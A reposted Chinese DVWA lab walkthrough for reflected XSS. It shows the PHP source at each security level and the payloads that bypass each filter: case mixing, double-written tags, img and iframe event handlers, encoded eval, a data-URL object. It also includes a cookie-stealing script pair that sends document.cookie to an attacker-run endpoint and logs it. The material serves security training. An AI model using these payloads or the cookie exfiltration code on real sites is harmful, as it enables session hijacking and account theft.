DVWA XSS (Reflected) 通关教程

最新推荐文章于 2025-04-28 16:07:04 发布
最新推荐文章于 2025-04-28 16:07:04 发布
阅读量637 收藏 8
点赞数 1
文章标签: php javascript ViewUI
原文链接:http://www.cnblogs.com/yyxianren/p/11381559.html
版权

XSS 介绍
XSS,全称Cross Site Scripting,即跨站脚本攻击,某种意义上也是一种注入攻击,是指攻击者在页面中注入恶意的脚本代码,当受害者访问该页面时,恶意代码会在其浏览器上执行,需要强调的是,XSS不仅仅限于JavaScript,还包括flash等其它脚本语言。根据恶意代码是否存储在服务器中,XSS可以分为存储型的XSS与反射型的XSS。

DOM型的XSS由于其特殊性,常常被分为第三种,这是一种基于DOM树的XSS。例如服务器端经常使用document.boby.innerHtml等函数动态生成html页面,如果这些函数在引用某些变量时没有进行过滤或检查,就会产生DOM型的XSS。DOM型XSS可能是存储型,也有可能是反射型。

XSS利用的常见用途:

盗取用户 cookies
劫持会话
流量劫持
网页挂马
DDOS
提升权限
...

本次先介绍反射型XSS:

 

Reflected Cross Site Scripting

反射型XSS,非持久化,需要欺骗用户自己去点击带有特定参数的XSS代码链接才能触发引起(服务器中没有这样的页面和内容),一般容易出现在搜索页面。

 

Low Security Level

<?php

// Is there any input?
if( array_key_exists( "name", $_GET ) && $_GET[ 'name' ] != NULL ) {
    // Feedback for end user
    echo '<pre>Hello ' . $_GET[ 'name' ] . '</pre>';
}

?>

可以看到,代码直接采用get方式传入了name参数,并没有任何的过滤与检查,存在明显的XSS漏洞。

Exploit

最普通的测试payload:

<script>alert(/xss/)</script>


XSS链接:

http://www.dvwa.com/vulnerabilities/xss_r/?name=<script>alert(/xss/)</script>#

成功弹窗;

弹窗之后的实战利用之盗取用户 cookies 进入后台:

攻击者自己网站http://localhost/xss/里构造:

hacker.js

var img = new Image();
img.src="http://localhost/xss/hacker.php?x=" + document.cookie;
document.body.append(img);

hacker.php

<?php
$cookie = $_GET['x'];
file_put_contents('cookie.txt', $cookie);
?>

于是插入dvwa的xss payload为:

<script src="http://localhost/xss/hacker.js" /></script>

XSS利用,得到cookies:

修改cookies从而得到权限进入后台。

 

Medium Security Level

<?php

// Is there any input?
if( array_key_exists( "name", $_GET ) && $_GET[ 'name' ] != NULL ) {
    // Get input
    $name = str_replace( '<script>', '', $_GET[ 'name' ] );

    // Feedback for end user
    echo "<pre>Hello ${name}</pre>";
}

?>

可以看到,这里对输入进行了过滤,使用str_replace函数将输入中的<script>替换为空,这种黑名单防护机制是可以被轻松绕过的。

Exploit

1.大小写绕过:

<ScRipt>alert(/xss/);</ScRipt>

XSS链接:

http://www.dvwa.com/vulnerabilities/xss_r/?name=<ScRipt>alert(/xss/);</ScRipt>#

2.双写方式绕过 str_replace()函数

<scr<script>ipt>alert(/xss/);</script>

XSS链接:

http://www.dvwa.com/vulnerabilities/xss_r/?name=<scr<script>ipt>alert(/xss/);</script>#

3.使用非 script 标签的 xss payload

例如:

img标签:

<img src=1 οnerrοr=alert('xss')>

<img src="1" οnerrοr=eval("\x61\x6c\x65\x72\x74\x28\x27\x78\x73\x73\x27\x29")></img>

iframe标签:

<iframe οnlοad=alert(1)>

<iframe src=javascript:alert('xss');height=0 width=0 /><iframe>

其他标签和利用还有很多很多….

 

High Security Level

<?php

// Is there any input?
if( array_key_exists( "name", $_GET ) && $_GET[ 'name' ] != NULL ) {
    // Get input
    $name = preg_replace( '/<(.*)s(.*)c(.*)r(.*)i(.*)p(.*)t/i', '', $_GET[ 'name' ] );

    // Feedback for end user
    echo "<pre>Hello ${name}</pre>";
}

?>

可以看到,High Security Level的代码同样使用黑名单过滤输入,preg_replace() 函数用于正则表达式的搜索和替换,这使得双写绕过、大小写混淆绕过(正则表达式中i表示不区分大小写)不再有效。

Exploit

虽然无法使用<script>标签注入 XSS 代码,但是可以通过img、body等标签的事件或者iframe、src等标签的构造可利用的js代码。

例如:

1.使用 img 标签和其编码转换后的 XSS payload

<img src=1 οnerrοr=alert(/xss/)>

XSS 链接:

http://www.dvwa.com/vulnerabilities/xss_r/?name=<img+src=1+οnerrοr=alert(/xss/)>#

img标签编码转换后的XSS payload例如:

<img src=1 οnerrοr=eval("\x61\x6c\x65\x72\x74\x28\x27\x78\x73\x73\x27\x29")></img>
<img src=1 οnerrοr=eval(String.fromCharCode(97,108,101,114,116,40,34,120,115,115,34,41))></img>
<img src=1 οnerrοr=eval("\u0061\u006c\u0065\u0072\u0074\u0028\u0027\u0078\u0073\u0073\u0027\u0029")></img>

2.使用 iframe 标签

<iframe οnlοad=alert(/xss/)>

3.使用 DATA URL 进行 XSS

<object data="data:text/html;base64,PHNjcmlwdD5hbGVydCgneHNzJyk8L3NjcmlwdD4="></object>

其他的XSS payload还有很多很多…

 

Impossible Security Level

<?php

// Is there any input?
if( array_key_exists( "name", $_GET ) && $_GET[ 'name' ] != NULL ) {
    // Check Anti-CSRF token
    checkToken( $_REQUEST[ 'user_token' ], $_SESSION[ 'session_token' ], 'index.php' );

    // Get input
    $name = htmlspecialchars( $_GET[ 'name' ] );

    // Feedback for end user
    echo "<pre>Hello ${name}</pre>";
}

// Generate Anti-CSRF token
generateSessionToken();

?>

PHP htmlspecialchars()函数

把预定义的字符转换为HTML实体:

& (和号)成为 &amp;
" (双引号)成为 &quot; 
' (单引号)成为 &apos;//生效需要加 ENT_QUOTES 参数
< (小于)成为 &lt;
> (大于)成为 &gt;

可以看到,Impossible Security Level的代码使用htmlspecialchars函数把预定义的字符:

& " ' < >

转换为HTML实体,防止浏览器将其作为HTML元素。从而防治了反射型XSS利用和危害。

 

 

转载自:AnCoLin's Blog|影风博客DVWA XSS (Reflected) 通关教程

转载于:https://www.cnblogs.com/yyxianren/p/11381559.html

DVWA全级别通关教程
weixin_52515588的博客
03-26 10万+
首先选择难度,我们从low开始,如上图所示进行修改 目录 SQL手工注入 过程: low Medium high Impossible SQL 盲注 过程: SQL 工具注入 工具安装过程: 过程: low Medium High: 暴力破解 过程: Low Medium High Impossible 命令注入 过程: Low Medium High: Impossible 文件上传 过程: Low Medium High Im...
DVWA——xss 通关教程
weixin_45960266的博客
12-07 1万+
xss注入的场景是一些论坛的留言板之类的,攻击者利用网页的漏洞写入程序脚本,当用户浏览的时候就会触发这个脚本。 reflectedxss只能是一次性的,而stored的xss是永久的,写入到留言板之后,就传入到服务器当中,当再有用户浏览时就会触发。 xss跟sql是非常想象的,最大的区别在于xss是前段,而sql是后端。且,xss很难获得webshell。 reflected xss low 查看源代码,发现对于输入没有要求,所以直接写入入选xxs就可以了 先设置难度为low 查看源码 发现没有任.
DVWA XSS (Stored) 通关教程
weixin_30703911的博客
08-20 1259
Stored Cross Site Scripting 存储型XSS,持久化,代码是存储在服务器中的,如在个人信息或发表文章等地方,加入代码,如果没有过滤或过滤不严,那么这些代码将储存到服务器中,用户访问该页面的时候触发代码执行。这种XSS比较危险,容易造成蠕虫,盗窃cookie等。 Low Security Level DVWA XSS (Stored) 通关教程 W...
DVWA靶场保姆级通关教程--01暴力破解
最新发布
m0_74020575的博客
04-28 2627
DVWA(全称)是一个专门为安全人员、渗透测试人员、网络安全爱好者设计的练习靶场。它是一个搭建在 Web 服务器上的超弱安全性的网站,里面故意做了很多漏洞,供人练习攻击和防护技巧。简单说,就是一个故意很脆弱的网站,让你安全地、合法地去学 Web 攻击和防御!接下来是他不同等级的攻略方式和思路,仅供参考。以下方法我均使用的bp自带的浏览器。第二个参数的猜解如下,没猜一个密码回车就行,会自动占一行。
DVWA通关教程
qq_45756971的博客
11-24 8167
Brute Force(暴力(破解)) Brute Force,即暴力(破解),是指黑客利用密码字典,使用穷举法猜解出用户口令,是现在最为广泛使用的攻击手法之一。 low: 先审计代码 <?php if( isset( $_GET[ 'Login' ] ) ) { // Get username $user = $_GET[ 'username' ]; // Get password $pass = $_GET[ 'password' ]; $pass =
DVWA XSS (DOM) 通关教程
weixin_30703911的博客
08-20 1230
DOM,全称Document Object Model,是一个平台和语言都中立的接口,可以使程序和脚本能够动态访问和更新文档的内容、结构以及样式。 DOM型XSS其实是一种特殊类型的反射型XSS,它是基于DOM文档对象模型的一种漏洞。 在网站页面中有许多页面的元素,当页面到达浏览器时浏览器会为页面创建一个顶级的Document object文档对象,接着生成各个子文档对象,每个页面元...
DVWA靶场XSS漏洞通关教程及源码审计
m0_74786138的博客
01-25 1246
公众号:泷羽Sec-track。
DVWA -XSSReflected)-通关教程-完结
刘箫-技术库
04-11 2664
XSS 攻击全称跨站脚本攻击。是指用户在 Web 页面中提交恶意脚本,从而使浏览包含恶意脚本的页面的用户在不知情的情况下执行该脚本,导致被攻击的行为。​ 与 SQL 注入类似,XSS 也是利用提交恶意信息来实现攻击效果的攻击行为。但是 XSS 一般提交的是 Javascript 脚本,运行在 Web 前端,也就是用户的浏览器;而 SQL 注入提交的SQL 指令是在后台数据库服务器执行。所以两者攻击的对象是不一样的。
DVWA靶场之xss通关笔记,详解带截图
AboutLzs的博客
03-21 1726
DVWA靶场Xss通关笔记
dvwa靶场通关教程(保姆及教学,一看就会)
热门推荐
m0_69043895的博客
04-05 2万+
可以看到,Impossible级别的代码对上传文件进行了重命名(为md5值,导致%00截断无法绕过过滤规则),加入Anti-CSRF token防护CSRF攻击,同时对文件的内容作了严格的检查,导致攻击者无法上传含有恶意脚本的文件。让通过验证的情况增加了一种。回到payload,选择第二个爆破点,选择递归模式,recursive grep,设置初始值。看源代码可以发现,不仅限制了文件类型,而且限制了大小,不能少于100kb。可以看到,靶场对文件类型做了限制,只允许上传png、jpeg,并且检查。
DVWA通关教程(下)
m0_57349349的博客
08-03 2296
DVWA之SQL注入和SQL盲注 sql注入 1.low级别 (1)判断是否存在注入点,是字符型还是数字形 输入 1,查询成功; 输入 1 and 1=1,发现查询仍然成功;//非数字形 输入 1/,发现查询仍然成功; 输入 1’,查询失败。出现如下图: (2)猜解 SQL 查询语句中的字段数 输入1' order by 10 # 发现报错 尝试1' order by 2 # 成功 (3)确定显示的字段顺序 输入 1' union select 1,2 # ...
DVWA通关教程(上)
m0_57349349的博客
07-11 3505
DVWA之暴力破解 低级,中级,高级(宏)和音叉 1.低级 (1)发送账户和错误密码 去burp把拦截到的内容发送到测试器 (2)点击开始攻击,看回复的字节长度 确定账户密码 2.中级 (1)发送账户和密码 去burp把拦截到的内容发送到测试器 (2)点击开始攻击,查看回复的字节长度判断出账户密码 3.高级 (1)打开burp 先不拦截 2008也打开 (2)打开工具栏浏览器 输入http://...
DVWA通关详细教程
来日可期的博客
08-13 1万+
DVWA通关详细教程
DVWA初级(low)通关教程
weixin_52029251的博客
04-25 305
Brute Force(暴力破解) 抓包重发到Intruder 选择攻击模式为Cluster bomb,并选中输入的账号和密码 接下来暴力破解 接下来就是慢慢跑了 Command Injection(命令注入) 输入我的IP地址ping通之后有回显 查看源码发现没有将拼接符禁用 开始命令注入 成功! File Inclusion(文件包含漏洞) 点击file1.php ...
网络安全之DVWA通关教程
qq_40216188的博客
04-14 1万+
网络安全值DVWA通关教程:包含安全及渗透细节
dvwa靶场通关教程xss
12-27
### DVWA XSS漏洞利用教程 #### 3.1 环境准备 为了进行DVWA中的XSS攻击实验,需先完成DVWA靶场环境的搭建以及Kali Linux系统的安装配置[^1]。 #### 3.2 设置DVWA难度级别 进入DVWA主页后,在左上角可调整安全性等级至低级以便于学习者更容易理解和实践XSS攻击原理。 #### 3.3 反射型跨站脚本攻击(Reflected XSS) 当用户输入的数据未经适当过滤就被返回给浏览器显示时就会发生反射型XSS。在DVWA中选择“XSS (Reflected)”选项卡并尝试提交恶意JavaScript代码作为查询参数的一部分来触发弹窗警告框`<script>alert('XSS')</script>`[^2]。 ```html <script>alert('XSS')</script> ``` #### 3.4 存储型跨站脚本攻击(Stored XSS) 存储型XSS发生在应用程序接收不可信数据并将这些数据永久保存下来之后再发送回其他用户的场景下。可以通过向留言板功能注入持久化的HTML/JS片段实现该类型的攻击模拟,比如发布一条包含如下内容的消息: ```html <img src="javascript:alert('Persistent%20XSS')"> ``` #### 3.5 DOM-based 跨站点脚本(DOM Based XSS) DOM-Based XSS不同于上述两种情况,它不涉及服务器端处理过程而是完全由客户端执行所引起的错误行为造成。可以在URL哈希部分附加带有潜在危害性的指令从而影响页面加载后的动态渲染效果,例如访问链接`http://localhost/DVWA/vulnerabilities/xss_d/?default=<img%20src=1%20onerror='alert(String.fromCharCode(88,83,83))'>#`将会导致图像加载失败事件被用来启动一个对话窗口展示字符串"XSS"。
评论
添加红包

请填写红包祝福语或标题

红包个数最小为10个

红包金额最低5元

当前余额3.43前往充值 >
需支付:10.00
成就一亿技术人!
领取后你会自动成为博主和红包主的粉丝 规则
hope_wisdom
发出的红包
实付
使用余额支付
点击重新获取
扫码支付
钱包余额 0

抵扣说明:

1.余额是钱包充值的虚拟货币,按照1:1的比例进行支付金额的抵扣。
2.余额无法直接购买下载,可以购买VIP、付费专栏及课程。

余额充值